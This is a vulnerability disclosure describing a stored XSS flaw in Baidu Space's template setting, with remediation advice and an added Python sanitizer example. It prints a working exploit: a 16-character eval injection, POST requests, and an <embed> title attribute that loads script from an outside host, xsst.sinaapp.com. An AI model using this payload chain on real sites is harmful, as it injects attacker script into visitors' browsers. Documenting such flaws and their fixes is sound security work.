Stored XSS in the new Baidu Space

Source: Internet
Author: User

The new version of Baidu Space does not filter the template value for XSS, so it can be exploited, but the length is limited to 20 characters; after subtracting the wrapper characters at both ends, only 16 remain. The approach is still the old one: the eval(X) and eval(name) tricks would need an indirect route, so we set them aside for now and look first for a place where an element with id="X" can be injected, and then...


1. The vulnerability lies in the template selection of the new Baidu Space.
2. Vulnerable address: http://hi.baidu.com/set/submit/theme
3. Vulnerable parameter: template
4. Cause: no input or output filtering is performed other than a 20-character length limit.
5. After a custom value is injected, the theme value appears in the following code on the Space homepage and on every article page:
 
window.currentApplyedTpl = '{template content}';
6. Based on this, the malicious value can be constructed as follows:
 
window.currentApplyedTpl = ''; eval(XXX) //';    // XXX is a variable we can control
7. Candidate objects for XXX:
';eval(qUserInfo.spaceName)// <-- 29 characters, not usable
';eval(M.innerHTML)// <-- 21 characters
';eval(M.title)// <-- 17 characters
';eval(M.name)// <-- 16 characters
';eval(M.alt)// <-- 15 characters
';eval(M.src)// <-- 15 characters
8. Based on the above, we have to find a place where we can write an element with id="M" and name="<eval code>". However, testing shows that tags in articles published on Baidu Space cannot carry an id attribute.
9. Fortunately, random testing showed that the <embed></embed> tag can be used directly (a leftover from the old Space?), and <embed></embed> can also carry a title attribute. (alt and name cannot be written, and src must start with http.)
10. Therefore, the exploitation steps can be constructed as follows.

Procedure:
 
A. POST http://hi.baidu.com/set/submit/theme
POSTDATA:
template=';eval(M.title)//&bdstoken={my token}&qing_request_source=
 
B. Publish any article, then modify the content of the POST to the following:
POST http://hi.baidu.com/pub/submit/modifytext
POSTDATA (parameters other than content omitted):
content = encodeURIComponent(<div><p><embed src="http://www.toolmao.com" id="M" title="(function(){var s=document.createElement('script');s.src='http://xsst.sinaapp.com/m.js';document.body.appendChild(s)})()"></p></div>)
 
C. This article is now a cross-site scripting page.
Vulnerability proof

Test platform: Win7 + Chrome, IE

Effect in Chrome: [screenshot]

Effect in IE: [screenshot]
Solution:

1. Filter the template content submitted to http://hi.baidu.com/set/submit/theme.
2. Is the new version of Space still using the embed tag at http://hi.baidu.com/pub/submit/modifytext? Even if it is, the id attribute can be filtered out, as is done for img.
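As an added illustration of the two remedies above (this is example code written for this page, not code from the write-up or from Baidu), the following Python sketch shows both sides of the fix: the template value is gated by an allowlist and encoded before it is written into the window.currentApplyedTpl string literal, so a quote in it can no longer terminate the literal; and article HTML is passed through a parser that drops id, title, name and alt from <embed> tags and rejects a src that does not start with http. The function names, the class name and the sample inputs are constructed for this example; the sample title attribute is a placeholder rather than the script from the write-up.

```python
import html
import json
import re
from html.parser import HTMLParser

# Constructed sample: the shape of the template value described in the write-up.
SAMPLE_TEMPLATE = "';eval(M.title)//"

# Constructed sample article body: an <embed> carrying id/title, with a
# placeholder in title instead of real script.
SAMPLE_POST = ('<div><p><embed src="http://www.toolmao.com" id="M" '
               'title="PLACEHOLDER-JS"></p></div>')

# Remedy 1a: a template name is a short identifier, nothing else.
TEMPLATE_NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,20}")


def accept_template(template):
    """Gate for the submit/theme endpoint: True only for a plain template name."""
    return TEMPLATE_NAME_RE.fullmatch(template) is not None


def js_string_literal(value):
    """Encode a value as a double-quoted JS string literal safe for an inline script.

    json.dumps escapes backslashes, double quotes and control characters; the
    extra replacements keep '<', '>', '&' and '/' from closing the <script>
    block or starting a comment if the literal is ever broken out of.
    """
    literal = json.dumps(value)
    return (literal.replace("<", "\\u003c").replace(">", "\\u003e")
            .replace("&", "\\u0026").replace("/", "\\/"))


def render_applied_tpl(template):
    """Remedy 1b: emit the assignment from the write-up with the value encoded."""
    return "window.currentApplyedTpl = %s;" % js_string_literal(template)


class EmbedAttrFilter(HTMLParser):
    """Remedy 2: rebuild article HTML, keeping only harmless <embed> attributes."""

    ALLOWED_EMBED_ATTRS = ("src", "type", "width", "height")

    def __init__(self):
        # convert_charrefs=False so entities are re-emitted as written, not decoded.
        super().__init__(convert_charrefs=False)
        self.out = []
        self.dropped = []   # names of attributes removed, for logging/alerting

    def handle_starttag(self, tag, attrs):
        if tag != "embed":
            self.out.append(self.get_starttag_text())
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in self.ALLOWED_EMBED_ATTRS:
                self.dropped.append(name)        # id, title, name, alt, on*, ...
                continue
            if name == "src" and not re.match(r"https?://", value):
                self.dropped.append(name)        # javascript:, data:, relative, ...
                continue
            kept.append('%s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<embed" + "".join(" " + a for a in kept) + ">")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        self.out.append("</%s>" % tag)

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append("&%s;" % name)

    def handle_charref(self, name):
        self.out.append("&#%s;" % name)

    def handle_comment(self, data):
        pass   # comments carry nothing the renderer needs; drop them


def sanitize_post(html_text):
    """Return (cleaned_html, dropped_attribute_names) for an article body."""
    parser = EmbedAttrFilter()
    parser.feed(html_text)
    parser.close()
    return "".join(parser.out), parser.dropped


if __name__ == "__main__":
    print("accepted:", accept_template(SAMPLE_TEMPLATE))
    print(render_applied_tpl(SAMPLE_TEMPLATE))
    print(sanitize_post(SAMPLE_POST))
```

Run stand-alone, the script rejects the sample template at the gate, shows that even an un-gated value lands inside a double-quoted literal with its slashes escaped, and strips id and title from the sample <embed>. The dropped-attribute list is returned rather than discarded so that a server could log how often such attributes are submitted, which is a useful signal for the article-publishing endpoint.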
 
Author gainover
